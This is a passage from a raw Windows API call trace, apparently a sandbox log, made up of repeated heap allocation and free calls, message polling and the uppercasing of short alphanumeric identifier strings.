Size=0x10) returned 0x2aab9b0 [0222.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0222.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0222.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.082] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0222.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0222.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0222.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0222.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0222.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0222.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0222.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0222.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0222.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0222.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0222.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0222.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0222.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0222.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0222.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.082] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0222.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0222.082] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0222.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0222.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0222.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab440 [0222.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0222.083] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0222.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0222.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0222.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0222.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0222.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0222.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0222.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0222.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0222.083] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0222.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0222.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0222.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0222.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0222.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0222.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0222.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0222.083] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0222.083] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0222.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0222.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0222.084] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0222.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab968 [0222.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73980 [0222.084] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0222.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0222.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0222.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0222.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0222.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0222.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0222.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0222.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0222.084] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0222.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0222.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0222.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0222.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0222.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0222.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0222.085] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0222.085] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0222.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0222.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0222.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0222.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0222.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0222.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0222.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0222.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0222.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0222.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0222.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73980 | out: hHeap=0x2af0000) returned 1 [0222.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0222.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0222.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0222.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0222.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0222.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0222.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0222.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0222.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0222.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0222.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0222.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0222.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0222.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0222.086] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0222.086] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0222.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0222.086] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0222.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0222.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0222.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaba10 [0222.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a741f0 [0222.086] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0222.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0222.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0222.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0222.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0222.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0222.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0222.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0222.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0222.087] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0222.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0222.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0222.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0222.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0222.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0222.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0222.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0222.087] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0222.087] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0222.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0222.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0222.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0222.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0222.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0222.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0222.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0222.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0222.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0222.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0222.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0222.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0222.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0222.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0222.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0222.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0222.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0222.088] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a741f0 | out: hHeap=0x2af0000) returned 1 [0222.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0222.088] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0222.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0222.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0222.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0222.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0222.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0222.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0222.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0222.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0222.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0222.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0222.089] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0222.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0222.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0222.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0222.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0222.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0222.089] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0222.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0222.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab770 [0222.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0222.089] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0222.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0222.089] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0222.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0222.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0222.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0222.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0222.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0222.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0222.089] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0222.090] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: 